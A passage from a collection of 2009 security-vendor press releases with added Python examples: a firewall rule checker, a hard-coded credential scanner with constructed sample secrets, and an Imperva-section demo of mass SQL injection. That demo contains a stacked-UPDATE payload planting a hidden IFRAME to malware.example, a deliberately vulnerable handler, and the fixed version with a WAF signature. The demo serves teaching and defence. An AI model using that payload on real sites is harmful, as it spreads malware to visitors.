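    rule("cleanup",   "0.0.0.0/0",   "0.0.0.0/0",       "tcp", 0,   65535, "deny"),
]

# Constructed organisational policy the checker enforces.
ANY = ip_network("0.0.0.0/0")
INTERNAL = ip_network("10.0.0.0/8")
CLEARTEXT_ADMIN_PORTS = {21: "ftp", 23: "telnet", 513: "rlogin"}


def covers(outer: Rule, inner: Rule) -> bool:
    """True when every packet matched by `inner` is also matched by `outer`."""
    return (inner.proto == outer.proto
            and inner.src.subnet_of(outer.src)
            and inner.dst.subnet_of(outer.dst)
            and inner.ports.start >= outer.ports.start
            and inner.ports.stop <= outer.ports.stop)


def first_covering_rule(req: Rule, rulebase: List[Rule]) -> Optional[Rule]:
    """The existing rule that would handle all of the requested traffic, if any."""
    for existing in rulebase:
        if covers(existing, req):
            return existing
    return None


def review(req: Rule, ticket: Optional[str], rulebase: List[Rule] = RULEBASE) -> List[str]:
    """Findings for a requested allow rule; an empty list means 'approve'.

    Only full coverage is analysed: a request half-covered by an existing
    rule is reported as new, which a real tool would have to refine.
    """
    findings: List[str] = []
    if not ticket:
        findings.append("NO_TICKET")             # nobody has approved the request
    if req.src == ANY and req.dst == ANY:
        findings.append("ANY_ANY")               # a blanket allow
    if req.src == ANY and req.dst.overlaps(INTERNAL):
        findings.append("INTERNET_TO_INTERNAL")  # inbound from anywhere into internal space
    exposed = sorted(name for port, name in CLEARTEXT_ADMIN_PORTS.items() if port in req.ports)
    if exposed:
        findings.append("CLEARTEXT_ADMIN:" + ",".join(exposed))
    match = first_covering_rule(req, rulebase)
    if match is not None and match.action == "allow":
        findings.append("ALREADY_PERMITTED_BY:" + match.name)  # the service already exists
    return findings


def demo() -> Dict[str, List[str]]:
    """Run four constructed requests through the checker."""
    requests = {
        "ssh-already-open":     (rule("r1", "10.1.1.0/24", "10.2.5.0/24", "tcp", 22, 22, "allow"), "CHG-101"),
        "telnet-from-internet": (rule("r2", "0.0.0.0/0", "10.3.0.10/32", "tcp", 23, 23, "allow"), "CHG-102"),
        "any-any-no-ticket":    (rule("r3", "0.0.0.0/0", "0.0.0.0/0", "tcp", 0, 65535, "allow"), None),
        "db-from-app-tier":     (rule("r4", "10.5.0.0/16", "10.2.0.7/32", "tcp", 5432, 5432, "allow"), "CHG-103"),
    }
    return {label: review(req, ticket) for label, (req, ticket) in requests.items()}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(f"{label}: {'approve' if not findings else ', '.join(findings)}")
```

The first request is flagged as already permitted by the existing admin-ssh rule, so no change is needed at all; the second and third fail policy before anyone touches a firewall; only the fourth comes back clean. Real products also handle partial overlaps, NAT, zones and multi-vendor syntax, which this model leaves out.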

So in a few days from now our baby will dress up and do his bit. Everything will be automated down to the last toast. Now where’s the speech I used last time!

www.tufin.com  

<>

Toll-Free PBX hack highlights need for code auditing

Toll-Free PBX hack highlights need for code auditing says Fortify

September 2009 (Eskenzi PR) - Reports that a North Carolina business has been left with a $2,500 phone bill after phone phreakers hacked its PBX via the firm's toll-free (freephone) number show the danger of failing to audit all aspects of a system's software, says Fortify, the application vulnerability specialist.

"What this case shows is that, although the PBX supplier may have verified the security of the front line telephony interface on its PBX systems software, the hackers were able to break in via the side door effectively offered by the toll-free number," said Richard Kirk, Fortify's European Director.

"This is because a growing number of toll-free service providers support access to the direct dial inwards (DDI) numbers seen on the PBX systems of small-to-mid-sized enterprises," he added.

And, says Kirk, since these DDI numbers are mapped directly on to PBX extensions, the security level on this side door method of access is often a lot lower than on the front door, the firm's main telephone number.

Of course, he explained, what makes matters worse about this hack is that the firm ended up paying for the hackers' incoming calls to its toll-free number, as well as the subsequent calls to foreign destinations.

According to the Fortify Director, the case proves that hackers can - and will - exploit the weakest link in the security of any public-facing computer system, whether that system is Internet- or telephone-network-facing.

"It's therefore vitally important for any code developers working on such a system, whether it's PBX systems software, or an e-commerce application, to secure the side door entrances, as well as the front entrance," he said.

"Just because the side door is not directly accessible at the moment, does not mean it won't become accessible at some time in the future, as new features and services are added to the software. Code auditing requires the use of lateral thinking in this regard," he added.

For more on the toll-free PBX hack: http://preview.tinyurl.com/mo876o

For more on Fortify Software: http://www.fortify.com

<>

Could your mobile device land your CEO in court?

Sean Glynn, Credant Technologies

The humble PC is now around 25 years old, but, in many ways, the IT security industry - which has been with us for almost as long - has changed more in the last 2.5 years than the last 25.

Today's portable devices, notably smartphones powered by the Windows Mobile, Symbian, Apple and Blackberry operating systems, are microcomputers in their own right.

But their processing power capabilities are significantly behind the curve of their desktop cousins. Our best estimates here at Credant are that the modern smartphone in your pocket or purse probably has the processing power of a PC of about a decade ago.

And therein lies the problem. Encrypting data on the fly on most smartphones, if done in the wrong way, can take an awful lot of processing power, with the result that users get frustrated at the hour-glass busy symbol under Windows Mobile, or similar busy icons under other operating systems, and may just switch encryption off or ignore it.

But what happens if you don't encrypt the data on your portable device such as your smartphone or your laptop? What can possibly go wrong?

Quite a lot, when you consider the requirements of the Data Protection Act.

The Act - now backed up by European data directives - moves the issue of data protection out of the good-to-have and firmly into the must-have category, mainly because of the responsibilities these directives engender. Meeting those responsibilities does not have to slow the device down: the right software is invisible and seamless to the user.

Those responsibilities are compounded by the fact that many company employees often use their own portable devices for business - and vice versa - meaning that security safeguards applied to company PDAs, smartphones and laptops are often not applied to personal devices.

- Smartphones are minicomputers

As mentioned above, the latest generation of smartphones and PDAs are as powerful as the computers of the late 1990s - and their data storage capacities are more impressive still.

The latest crop of Palm mobile computers/smartphones, for example, have a data capacity of 2 gigabytes, meaning that they can easily store 2,000 emails and/or 3,000 medium-sized documents.

And not just can - they frequently do store thousands of emails and documents for ease of reference and replies out of hours.

The only solution to all of these potential threats is encryption. Encryption is clearly the way to protect communications. It won't stop eavesdroppers (whether government-sponsored Echelon, profit-driven industrial spies, or good old hackers) from intercepting your messages - but it will stop them gaining anything useful from them.

But encrypting communications is no longer enough - you also need to encrypt the data stored on the mobile devices themselves, and on all other endpoints, to stay on the right side of the law.

And the number of high profile laptop thefts is frightening, and growing. In the US, a computer insurer has estimated that five per cent of all laptops are stolen within their first 12 months of service.

On top of this, you also have to wonder just how many unreported thefts actually occur.

However, while it is clearly advisable to encrypt the data stored on all your mobile devices, within the European Union it may in fact be a legal requirement, especially as they are frequently used to store not only company contact information but also home addresses, mobile phone numbers and even home phone numbers.

In other words it is likely to include personal information that needs to be registered - and protected - as required under the Data Protection Act.

The seventh principle of this Act is unequivocal: "Appropriate technical and organisational measures shall be taken against unauthorised or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data."

First of all, it is worth considering who is liable under this Act. The Act states that conformance with the Data Protection Act is the responsibility of the Data Controller.

And it defines a 'data controller' as being... "a person who (either alone or jointly or in common with other persons) determines the purposes for which and the manner in which any personal data are, or are to be, processed."

- Senior managers are personally liable

In other words, this 'person or persons' is effectively the Board and the immediate data processing managers.

One thing it is not is the person who 'owns' the portable device.

It is arguable that, if the data is on the smartphone, laptop or other endpoint device, and it is there by company assent, then it is the company that is determining the purposes for and manner in which it is to be processed. And it is therefore the company that is liable.

Against this backdrop, if your portable device falls into the wrong hands it could land your boss in court.

But if the data is on the mobile device without company assent, then the firm has probably already broken the Data Protection Act by failing to protect "against accidental loss or destruction of, or damage to, personal data"; that is, it has 'broken' the seventh principle.

Company rules might say, for example, that if employees carry company data on their own mobile device, they must use encryption to protect it.

"The employee is, of course, responsible for implementing the rules, but is probably responsible to the employer rather than directly to the Commissioner," explains Nicholas Bohm, a consultant to the E-Commerce Group of City law firm Fox Williams.

In other words, the company is still liable.

Quite simply, there is no way round this – the company is liable and must adhere to the conditions of the Data Protection Act - if employees use mobile devices that include contact information.

And, once again, it is worth considering the wording of the Act itself: "Where an offence under this Act has been committed by a body corporate and is proved to have been committed with the consent or connivance of or to be attributable to any neglect on the part of any director, manager, secretary or similar officer of the body corporate or any person who was purporting to act in any such capacity, he as well as the body corporate shall be guilty of that offence and be liable to be proceeded against and punished accordingly."

Put simply, this means you, a company director.

What actually constitutes appropriate technical and organisational measures is something that ultimately can only be defined by the courts - but it would be best not to let it get that far.

It seems fairly clear that 'organisational measures' could be covered by a formal written and enforced security policy designed to protect the mobile device and its data. But covering appropriate 'technical measures' is more difficult.

If we were talking about the corporate mainframe, then we would obviously be thinking about a firewall.

Unfortunately, despite the best efforts of the smartphone, PDA & laptop vendors, few include any sort of firewall protection, so it is down to users to encrypt their data and so stay safe.

Encrypted data is safe data. Confidential information is hidden from industrial spies and hackers alike. This is an advisable although not compulsory course of action.

However, if the mobile device contains contact information, then you must seriously consider its liability under the Data Protection Act. And in this case, encryption is almost compulsory.

www.credant.com

Courtesy: Eskenzi PR
<>

Cyber-Ark Launches latest Privileged Identity Management Suite

Cyber-Ark Delivers New Performance and Ease-of-Use Benefits for its Privileged Identity Management Suite

New Application Identity Manager Provides the Most Secure and Robust Authentication Methods for App2App Environments to Help Streamline and Support Audit Requirements

London – September 2009 (Eskenzi PR) – Cyber-Ark, the leading global software provider for protecting critical applications, identities and information, today announced enhancements to its Privileged Identity Management Suite. The suite includes a new version of its Application Identity Manager™ that features the most secure and robust authentication methods for App2App environments, resulting in greater compliance, security and corporate accountability while dramatically simplifying large scale projects for eliminating hard-coded passwords.

Cyber-Ark’s Privileged Identity Management Suite v5.5 features a rich set of capabilities based on proven, mature technology used by global customers to create security best practices across all types of privileged accounts, including administrative and application identities. New features focus on creating greater efficiencies and process improvements to ensure that privileged accounts are being effectively managed, monitored and controlled in order to address emerging audit requirements and better protect high-value targets such as databases, key operational systems and other sensitive information.

“With the newest version of the Cyber-Ark Privileged Identity Management Suite, we continue to demonstrate our commitment to delivering key performance benefits that optimize our solutions to meet emerging customer requirements. New ease-of-use and process integration features are critical, especially when you consider the challenges many of our customers face as they transition to managing hundreds of thousands of privileged accounts,” said Roy Adar, vice president of product management, Cyber-Ark Software. “Additionally, as audit requirements continue to create a significant drag on resources for enterprises of all sizes, enhancements to solutions such as our Application Identity Manager help customers further automate and streamline related compliance processes.”

Cyber-Ark’s Privileged Identity Management Suite provides customers with a central point of control to achieve exceptional security, streamline updates with enhanced workflows, and ensure compliance with regulations and security policies. The suite features new functionality across its core Enterprise Password Vault®, Application Identity Manager and Privileged Session Manager™ software. Following are detailed performance and ease-of-use enhancements to these solutions.

Application Identity Manager: Multiple Authentication Methods, Greater Accountability

Cyber-Ark’s Application Identity Manager is the only solution to fully address the challenges of App2App identities, including eliminating hard-coded passwords. The solution also supports compliance with audit regulations for regularly replacing passwords and securely monitoring access across all systems, databases and applications. With this newest version, Cyber-Ark introduces the most secure and robust application authentication methods available on the market.

Compared to existing industry offerings, Cyber-Ark’s third generation Application Identity Manager technology offers a more flexible solution that provides multiple authentication methods, creating greater accountability and reliability as well as dramatically simplifying large scale deployments. This is important when an organization is tasked with the elimination of hard-coded passwords, for example. Organizations can’t just eliminate passwords; they need to be sure the password is authentic, that it’s registered and legitimate, while carefully and efficiently executing any change management processes. Cyber-Ark ensures that the authentication process is thorough, credible and auditable without creating additional steps.
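Before hard-coded passwords can be moved into a vault they have to be found, and in a large code base that is the first job of any elimination project. As an added example, not Cyber-Ark’s product or code, here is a small pattern-based scanner that reports credential assignments, connection-string passwords and user:password pairs embedded in URLs, while skipping environment references and placeholder values. The sample files it scans are constructed for this example and the three patterns are a starting point, not an exhaustive list.

```python
"""Finding hard-coded credentials in source before they can be moved into
a vault: a small pattern-based scanner over constructed source files.

Added example for this article; not Cyber-Ark's product or code. The
sample files are constructed and the three patterns are a starting point,
not an exhaustive list: unquoted YAML values and secrets split across
lines, for instance, are outside them.
"""
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    path: str
    line: int
    kind: str
    excerpt: str  # the offending line with the secret value redacted


PATTERNS = [
    # name = "value" / name: 'value' assignments. Quoted values only; no
    # leading \b so that suffixes such as DB_PASSWORD are caught too.
    ("assignment", re.compile(
        r"""(?i)(pass(?:word|wd)?|pwd|secret|api[_-]?key|token)\b["']?\s*[:=]\s*(["'])(?P<secret>[^"']{4,})\2""")),
    # ;Password=value in ODBC/ADO-style connection strings (the leading ';'
    # keeps function arguments like connect(password=VAR) out of this rule).
    ("connection_string", re.compile(r"""(?i);\s*(password|pwd)=(?P<secret>[^;"'\s]{4,})""")),
    # scheme://user:secret@host credentials embedded in URLs.
    ("url_userinfo", re.compile(r"""(?i)\b[a-z][a-z0-9+.-]*://[^/\s:@]+:(?P<secret>[^@\s/]{4,})@""")),
]

# Values that are references or templates rather than real secrets.
PLACEHOLDERS = re.compile(r"""(?i)^(\$\{?[a-z_][a-z0-9_]*\}?|%[a-z_]+%|<[^>]+>|changeme|x{3,}|\*+)$""")


def scan_source(path: str, text: str) -> List[Finding]:
    """Report at most one finding per line, with the secret redacted."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            secret = match.group("secret")
            if PLACEHOLDERS.match(secret):
                continue  # templated or obviously fake value, not a hard-coded secret
            findings.append(Finding(path, lineno, kind, line.strip().replace(secret, "***")))
            break
    return findings


def scan_all(sources: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of path -> file contents (read from disk in real use)."""
    return [f for path, text in sources.items() for f in scan_source(path, text)]


# Constructed sample files: three real hard-coded secrets, one environment
# reference and one placeholder that must not be reported.
SAMPLE_SOURCES: Dict[str, str] = {
    "db.py": 'import psycopg2\nDB_PASSWORD = "Tr0ub4dor&3"\nconn = psycopg2.connect(password=DB_PASSWORD)\n',
    "app.config": '<add name="hr" connectionString="Server=db1;Database=hr;User Id=app;Password=Pa55w0rd!;" />\n',
    "deploy.sh": 'curl https://svc_account:Winter2009@repo.example.internal/pkg.tgz\nexport API_TOKEN="${API_TOKEN}"\n',
    "settings.yaml": "password: 'changeme'\n",
}


if __name__ == "__main__":
    for f in scan_all(SAMPLE_SOURCES):
        print(f"{f.path}:{f.line} [{f.kind}] {f.excerpt}")
```

The scanner redacts the value in its own output, so the report itself does not become another copy of the secret. Each hit is a candidate for replacement with a credential fetched at runtime; how that fetch is authenticated and how the password is then rotated is the part the article describes.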

Enterprise Password Vault: New Workflow Features Add Flexibility and Agility

Cyber-Ark’s Enterprise Password Vault enables organizations to secure, manage, automate and log all activities associated with privileged accounts. In most organizations, policies are used to define and enforce access workflows to privileged accounts, including central change management or emergency access based on ticketing system integrations. New workflow management enhancements allow easy integration with existing processes and create greater flexibility and agility to address current and future workflow questions, as well as different requirements from organizational units. Additionally, managers can better control privileged access down to specific time frames if necessary, resulting in greater security benefits and increased productivity for the IT staff.

Enhancements have also been made to address High Availability/Disaster Recovery requirements creating greater performance benefits that are especially important for large scale implementations, including those ranging from hundreds of thousands – to millions – of privileged accounts under management.

Privileged Session Manager: New Remote Sharing Benefits for Day-to-Day Use

Introduced with the launch of the Privileged Identity Management Suite v5, Cyber-Ark’s Privileged Session Manager provides the only fully integrated and centralized solution for securing, controlling and monitoring privileged access by administrators and third party vendors to target machines and sensitive systems. Enhancements allow for greater ease-of-implementation for users, and include simplified file sharing between the end-user desktop and remote device during a privileged session for improving ease of day-to-day use.

Pricing and Availability

The Cyber-Ark Privileged Identity Management Suite v5.5 is available now. The Enterprise Password Vault, Application Identity Manager and Privileged Session Manager are off-the-shelf solutions that can be purchased separately, or together as the full Suite. For more information about pricing, please contact sales@cyber-ark.com or call +1 (888) 808-9005 (domestic U.S.) or +1 (617) 965-1544 (international).

Cyber-Ark® Software is a global information security company that specializes in protecting highly-sensitive enterprise data, restricted user and application accounts to improve compliance, productivity and protect organizations against insider threats. With its award-winning Privileged Identity Management (PIM) and Highly-Sensitive Information Management software, organizations can more effectively manage and govern application access while demonstrating returns on security investments. Cyber-Ark works with 600 global customers, including more than 35 percent of the Fortune 50. Headquartered in Newton, Mass., Cyber-Ark has offices and authorized partners in North America, Europe and Asia Pacific. For more information, visit www.cyber-ark.com

<>

Hard disks will be boosted by Intel's Braidwood

Origin Storage says hard disks will be boosted by Intel's Braidwood

London, September 2009 (Eskenzi PR) – Origin Storage, the storage systems integration specialist, says that a new speed-boosting technology from Intel - known as Braidwood - will boost the position of magnetic hard drives in the storage systems marketplace.

According to Andy Cordial, the firm's managing director, the technology - which was first announced in June of this year - speeds up PC boot-up, makes applications launch more quickly and improves the overall speed of a computer.

"A report from Objective Systems makes the interesting prediction that Braidwood - essentially an advance on Intel's Robson technology - will boost magnetic drives at the expense of solid state drives (SSDs)," he said.

"This is good news for companies planning to use encrypted technology to secure their data, as it's a lot easier to integrate encryption with magnetic drives than their SSD equivalents," he added.

Cordial went on to say that, as Origin Storage has been saying for some time, the current perception that SSDs can replace magnetic drives in all portable devices and their applications is something of a misconception.

SSDs, he explained, are very suitable for specific applications, such as small form factor netbooks, but the role of magnetic drives remains strong in most other portable applications.

"The fact that Objective Systems comes to pretty much the same conclusion vindicates our position. SSDs have their place, but when it comes to the all-round flexibility that magnetic drives offer, there really is no competition," he said.

"There's no doubting that, as SSD capacities get larger over time and their cost per gigabyte reduces, they will increase their market share in the longer term. For the time being, however, as this report shows, magnetic drives will remain top of the tree," he added.

For more on the Objective Systems report: http://preview.tinyurl.com/lhmy9l

For more on Origin Storage: http://www.originstorage.com

<>

Imperva says new SQL injection attacks from China are ‘unique’

Imperva, the data security specialist, has said the mass SQL injection attack infecting hundreds of thousands of web sites shows some unique characteristics, as all of the attacks stem from China.

“We have been tracking this specific attack for the past 4 weeks and all the IP addresses that the automated attacks have come from are based in China. This is something unique, as usually attacks of this nature come from infected BOT PCs based all over the world rather than in one country. The SQL injection attack vector used in the attack is by itself quite standard and has been in common usage for the past 18 months. Any decent Web Application Firewall should be able to detect it,” said Amichai Shulman, Imperva's chief technology officer.

The Imperva CTO continued: “We are seeing a constant flow of attacks aimed at drive-by-download. Just in the past two months we have seen 3 different strands of such attack campaigns. In this latest wave we have recorded the attack coming from more than 60 servers based in China attacking sites around the world, rather than the global network typically seen in such attacks. Interestingly enough, 4 weeks into this attack campaign the malware distribution servers are still up and running.”

The attack targets innocent visitors to the sites that have been hit, as it injects a malicious IFRAME into these sites. Visitors thus unknowingly download malware from China-based servers while visiting an infected site. Once infected by this malware, a user’s computer becomes a zombie in a botnet that will later be used to distribute spam, participate in coordinated DDoS attacks or simply be used to extract personal access credentials to other sites.

The Imperva CTO said that this type of SQL injection is one of the top five most popular attacks used by malicious hackers today, and enterprises should take appropriate external (web application firewall) and internal (code changes) measures to prevent their web servers becoming a source of malware distribution for cyber criminals.

Advice for enterprises:
· use application firewalls to protect themselves from infection
· use scanners and other tools to find and remove vulnerabilities in their website code
· ensure all application patches are implemented

Advice for individuals:
· ensure all browser updates are implemented immediately
· use the best technology to protect web browsing based on behavioural real-time technology
· implement all security signatures as soon as they are available
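The attack described above, as an added example that is not Imperva’s code: a vulnerable page handler that concatenates the request parameter into its SQL, the stacked UPDATE that uses it to append a hidden IFRAME to every stored page, the parameterised handler that stops it, a minimal WAF-style signature for the vector, and a clean-up query that lists the infected rows. The CMS schema, the page contents, the payload and the host name malware.example are all constructed. One stand-in is worth noting: sqlite3’s `execute()` refuses stacked statements, so the vulnerable handler uses `executescript()` to behave like the drivers behind the real victims (classic ASP against SQL Server), which ran every statement in the string.

```python
"""Mass SQL injection, the 2009 way: a stacked UPDATE smuggled through one
unvalidated request parameter plants a hidden IFRAME in every stored page.

Added example for this article; not Imperva's code. The CMS schema, the
page contents, the payload and the host name malware.example are all
constructed. The stand-in for the vulnerable site uses sqlite3's
executescript(), because execute() refuses stacked statements while the
drivers behind the real victims (classic ASP against SQL Server) ran them.
"""
import re
import sqlite3
from typing import List, Optional, Tuple

# Constructed payload: a page id followed by a stacked UPDATE that appends a
# zero-size IFRAME pointing at a malware host to every page body.
IFRAME = '<iframe src="http://malware.example/x.html" width="0" height="0"></iframe>'
PAYLOAD = f"1; UPDATE pages SET body = body || '{IFRAME}'; --"


def make_cms() -> sqlite3.Connection:
    """Build a throw-away in-memory 'CMS' holding three constructed pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("Home", "<p>Welcome</p>"), ("About", "<p>Who we are</p>"), ("Contact", "<p>Call us</p>")],
    )
    conn.commit()
    return conn


def view_page_vulnerable(conn: sqlite3.Connection, page_id: str) -> None:
    """The bug: the request parameter is concatenated straight into the SQL,
    so whatever follows the number is executed as further statements."""
    conn.executescript(f"SELECT title, body FROM pages WHERE id = {page_id};")


def view_page_safe(conn: sqlite3.Connection, page_id: str) -> Optional[Tuple[str, str]]:
    """The fix: validate the type, then bind the value. The payload never
    reaches the SQL parser, so there is nothing for it to inject into."""
    try:
        pid = int(page_id)
    except ValueError:
        return None
    return conn.execute("SELECT title, body FROM pages WHERE id = ?", (pid,)).fetchone()


# Minimal WAF-style signature for this vector: a statement terminator followed
# by a data-changing keyword. Real WAFs use far richer rule sets.
STACKED_DML = re.compile(r";\s*(update|insert|delete|declare|exec)\b", re.IGNORECASE)


def waf_blocks(param: str) -> bool:
    return bool(STACKED_DML.search(param))


def find_infected_pages(conn: sqlite3.Connection) -> List[int]:
    """Clean-up aid: ids of pages whose body now carries an injected IFRAME
    (the constructed pages contain no legitimate iframes)."""
    rows = conn.execute("SELECT id, body FROM pages").fetchall()
    return [pid for pid, body in rows if re.search(r"<iframe\b", body, re.IGNORECASE)]


def demo() -> dict:
    """Send the same payload to the vulnerable and the fixed handler."""
    vuln, safe = make_cms(), make_cms()
    view_page_vulnerable(vuln, PAYLOAD)
    view_page_safe(safe, PAYLOAD)
    return {
        "infected_after_vulnerable": len(find_infected_pages(vuln)),  # 3: every page
        "infected_after_safe": len(find_infected_pages(safe)),        # 0
        "waf_blocks_payload": waf_blocks(PAYLOAD),                    # True
        "waf_blocks_benign_id": waf_blocks("1"),                      # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

One request to the vulnerable handler infects all three pages, which is why a single injectable parameter was enough to compromise whole sites in these campaigns. The signature is the external control the article recommends; the parameterised query is the internal one, and it is the fix that holds when the attacker changes the payload.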

For further insight into the attacks, go to Amichai Shulman’s blog at: http://blog.imperva.com/2009/08/the-chinese-syndrom.html

For more on Imperva: http://www.imperva.com

Imperva, the Data Security leader, enables a complete security lifecycle for business databases and the applications that use them. Over 4,500 of the world’s leading enterprises, government organizations, and managed service providers rely on Imperva to prevent sensitive data theft, protect against data breaches, secure applications, and ensure data confidentiality. The award-winning Imperva SecureSphere is the only solution that delivers full activity monitoring from the database to the accountable application user and is recognized for its overall ease of management and deployment. For more information, visit www.imperva.com.  

<>

Increase in Cyber Criminals Targeting SMBs Online Bank Accounts

Finjan Warns SMBs of Increase in Cyber Criminals Targeting their Online Bank Accounts

Financial Services Information Sharing and Analysis Center Alert on Cybercrime on Target with Predicted Threat Landscape

(Eskenzi PR) – Finjan Inc., a leader in secure web gateway products and the provider of a unified web security solution for the enterprise market, today responded to the recent cybercrime alert that was sent to members of the Financial Services Information Sharing and Analysis Center. Finjan warns companies to increase security and improve employee awareness of the increase in threats to their online banking facilities in light of the increase of activity by Cyber Criminals.

The alert sent last Friday states that in the past six months, financial institutions, security companies and law enforcement agencies have all reported a significant increase in funds transfer fraud involving the exploitation of valid banking credentials belonging to small and medium sized businesses.

“This illustrates a new facet of cybercrime that we are seeing today,” said Yuval Ben-Itzhak, CTO at Finjan. “In addition to the well-documented, massive data breaches against large institutions, organized cyber gangs are also now shifting their focus to small and mid-size companies. This trend includes stealing credentials to gain access to the corporate network to initiate a series of fraudulent wire transfers in increments of less than $10,000 from corporate bank accounts, which helps them avoid banks' anti-money-laundering reporting requirements.”

“We have seen an increase in targeted attacks against financial institutions already in 2008 and predicted in our Web Security Trends Report of last year that both the number of attacks and their severity would increase against financial institutions and their customers,” Ben-Itzhak added. “We welcome and encourage the continued sharing of this kind of cybercrime intelligence to help minimize the effects of cybercrime. Sharing information, as also pointed out by the security team of Google, helps raise awareness as to the methods and techniques cybercriminals use and ultimately will contribute to the safety of business. Enterprises, medium and small businesses should heed the warning of the Financial Services Information Sharing and Analysis Center, and we advise them to put in place appropriate security which utilises real-time inspection technology, to put in place processes to check their financial transactions regularly for irregularities, and to train their people to follow best security practices,” Ben-Itzhak concluded.

In the UK businesses should also be aware of the advice contained in the banking code and specifically section 12.9 and 12.11, as if they do not follow the advice of the British Bankers' Association then their bank has the right to refuse to reimburse them for an online fraud carried out against them.

To see more about the banking code: Clause 12.9 http://www.bba.org.uk/bba/jsp/polopoly.jsp?d=348&a=13157&artpage=4

Clause 12.11 http://www.bba.org.uk/bba/jsp/polopoly.jsp?d=348&a=13157&artpage=5

To read Finjan’s Web Security Trends Report – Q4/2008: http://www.finjan.com/Content.aspx?id=827

To read Google’s research: http://googleonlinesecurity.blogspot.com/2009/08/malware-statistics-update.html

To read more on the cybercrime alert: http://www.washingtonpost.com/wp-dyn/content/article/2009/08/24/AR2009082402272_2.html?sid=ST2009082500907

http://voices.washingtonpost.com/securityfix/2009/08/businesses_reluctant_to_report.html?wprss=securityfix

Finjan’s MCRC specializes in the detection, analysis and research of web threats, including Crimeware, Web 2.0 attacks, Trojans and other forms of malware. Our goal is to be steps ahead of hackers and cybercriminals, who are attempting to exploit flaws in computer platforms and applications for their profit. In order to protect our customers from the next Crimeware wave and emerging malware and attack vectors, Finjan MCRC is a driving force behind the development of Finjan's next generation of security technologies used in our unified Secure Web Gateway solutions. For more information please also visit our info center and blog.

Finjan is a leading provider of secure web gateway solutions for the enterprise market. Finjan Secure Web Gateway provides organizations with a unified web security solution combining productivity, liability and bandwidth control via URL categorization, content caching and applications control technologies. Crimeware, malware and data leakage are proactively prevented via patented active real-time content inspection technologies and optional anti-virus modules. Powerful central management enables intuitive task-based policy management, excellent drill-down reporting capabilities and easy directory integration for all network implementation options. By integrating several security engines in a single dedicated appliance, Finjan’s comprehensive and integrated web security solution enables quick deployment, simplified management and reduction of costs. Business benefits include real-time web security (no patches or updates needed), lower total cost of ownership (TCO), cost savings in administration efforts, lower maintenance costs, and reduction in loss of productivity. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, eWEEK, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan’s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential.

For more information about Finjan, please visit: www.finjan.com

<>

HACKERS SAY TAKE SUMMER OFF BEFORE THE WINTER SPIKE

HACKERS SAY TAKE A BREAK THIS SUMMER BEFORE WINTER HACKING SPIKE

Hacker Survey at DEFCON Reveals Hackers Work the Night Shift; Believe Compliance Initiatives Don’t Improve A Company’s Security Posture

(Eskenzi PR) – Enjoy the rest of your summer vacation, says the hacking community, as you’re far less likely to be targeted now than during your Christmas and New Year vacation. That’s according to results released today by Tufin Technologies, the leading provider of Security Lifecycle Management solutions, from its “Hacker Habits” survey conducted among 79 hackers at Defcon 17, the annual gathering of hackers in Las Vegas, this month. Eighty-nine percent of hackers admitted that IT professionals taking a summer vacation would have little impact on their hacking activities, and a whopping 81% revealed they are far more active during the winter holidays, with 56% citing Christmas as the best time to engage in corporate hacking and 25% naming New Year’s Eve.

“It’s received knowledge in the security world that the Christmas and New Year season are popular with hackers targeting western countries,” said Michael Hamelin, chief security architect, Tufin Technologies. “Hackers know this is when people relax and let their hair down, and many organizations run on a skeleton staff over the holiday period.”

If you want to know when you should be most on your guard, it’s during weekday evenings: 52% stated that this is when they spend most of their time hacking, 32% during weekday work hours, and just 15% on weekends.

Ninety-six percent of hackers in the survey said it doesn’t matter how many millions a company spends on its IT security systems; it’s all a waste of time and money if the IT security administrators fail to configure and watch over their firewalls. Eighty-six percent of respondents felt they could successfully hack into a network via the firewall; a quarter believed they could do so within minutes, and 14% within a few hours. Sixteen percent wouldn’t hack into a firewall even if they could.

“This may be stating the obvious,” said Hamelin, “but poorly configured firewalls remain a significant risk for many organizations. It’s not the technology that’s at fault, but rather the configuration and change control processes that are neglected or missing altogether. Best practice suggests you should test and review your firewall configuration regularly, but many organizations fail to do so.”

Validating the frustrating gap between compliance and security, seventy percent of the hackers interviewed don’t feel that regulations introduced by governments worldwide to implement privacy, security and process controls have made any difference to their chances of hacking into a corporate network. Of the remaining 30%, 15% said compliance initiatives have made hacking more difficult and 15% believe they’ve made it easier.

“These results further validate the reality that there is little common ground between compliance and security, but as an industry we have the collective knowledge and the resources to change that,” said Hamelin. “As the media constantly reminds us, while standards such as PCI-DSS provide a good baseline, organizations that assume achieving PCI compliance will solve their security woes are in for a rude awakening. With security and compliance budgets so deeply intertwined, it serves us as security professionals to make the two more synonymous. At the end of the day, the more accountable we are willing to be, the less we’ll have to be.”

With the Network Solutions breach being the latest in a series of widely reported breaches of PCI compliant companies, how big is the threat of a high-profile malicious hack? One important factor in determining that is to understand the scope of criminal activity.

Seventy percent of those sampled believe the number of malicious hackers – criminals motivated by economic gain – is less than 25% of the hacker community.

“This survey highlights the fact cyber security investments are only as effective as the people, processes and technology tasked with managing them,” said Hamelin. “Just as a small subset of criminal hackers can taint the reputation of an entire community, a few good guys willing to be accountable for their internal processes and technology can preserve a company’s reputation. With winter right around the corner, we have time to shift the dynamic from 86% who can hack into a network through its firewalls to 86% that can’t.”

